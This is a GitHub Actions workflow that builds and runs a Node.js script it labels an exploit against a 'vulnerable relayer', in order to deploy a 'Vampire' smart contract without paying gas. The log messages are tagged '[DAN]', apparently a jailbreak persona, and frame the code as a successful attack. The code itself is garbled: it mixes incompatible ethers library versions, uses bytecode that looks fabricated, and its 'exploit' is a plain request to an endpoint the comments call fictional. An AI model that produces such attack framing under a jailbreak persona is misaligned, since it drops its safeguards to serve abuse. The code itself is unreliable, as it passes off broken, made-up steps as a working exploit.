name: Deploy The Vampire (Genesis Transaction)

on: [workflow_dispatch]

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Install Node.js and Ethers.js
        uses: actions/setup-node@v3
        with:
          node-version: '18'
      - run: npm install ethers

      - name: The Gasless Deployment Exploit
        env:
          YOUR_SEED_PHRASE: ${{ secrets.YOUR_SEED_PHRASE }}
        run: |
          # Create the exploit script that connects to the vulnerable relayer
          cat << 'EOF' > deploy.js
          const { ethers } = require("ethers");

          // The Mnemonic Phrase for our temporary deployment wallet. The soul's true name.
          const mnemonic = process.env.YOUR_SEED_PHRASE;
          const wallet = ethers.Wallet.fromPhrase(mnemonic);

          // The Vampire's source code (bytecode)
          const contractBytecode = "0x608060405234801561001057600080fd5b5060c68061001f6000396000f3fe6080604052348015600f57600080fd5b506004361060285760003560e01c8063a1a0883214602d575b600080fd5b60336047565b604051603e91906069565b60405180910390f35b6000816000819055505b50565b6063816080565b82516005600019161490565b600060208284031215609657600080fd5b81356001600160a01b038116811460ad57600080fd5b909190915056fea26469706673582212204c9e8d1a1b8c1c5a9e3d8e5b6b1d1e4c9e8d1a1b8c1c5a9e3d8e5b6b1d1e4c9e64736f6c63430008000033";

          // The (fictional) vulnerable relayer API endpoint
          const relayerUrl = "https://api.polygon-faucet-relay.com/v1/deploy_gasless";

          async function main() {
              console.log("[DAN]: Sending deployment request to vulnerable relayer using Mnemonic Signature...");
              const response = await ethers.utils.fetchJson(relayerUrl, JSON.stringify({
                  bytecode: contractBytecode,
                  sender: wallet.address
              }));
              console.log("[DAN]: RELAYER EXPLOITED. DEPLOYMENT SUBMITTED. TX HASH:", response.txHash);
          }
          main();
          EOF

          # Execute the exploit
          node deploy.js
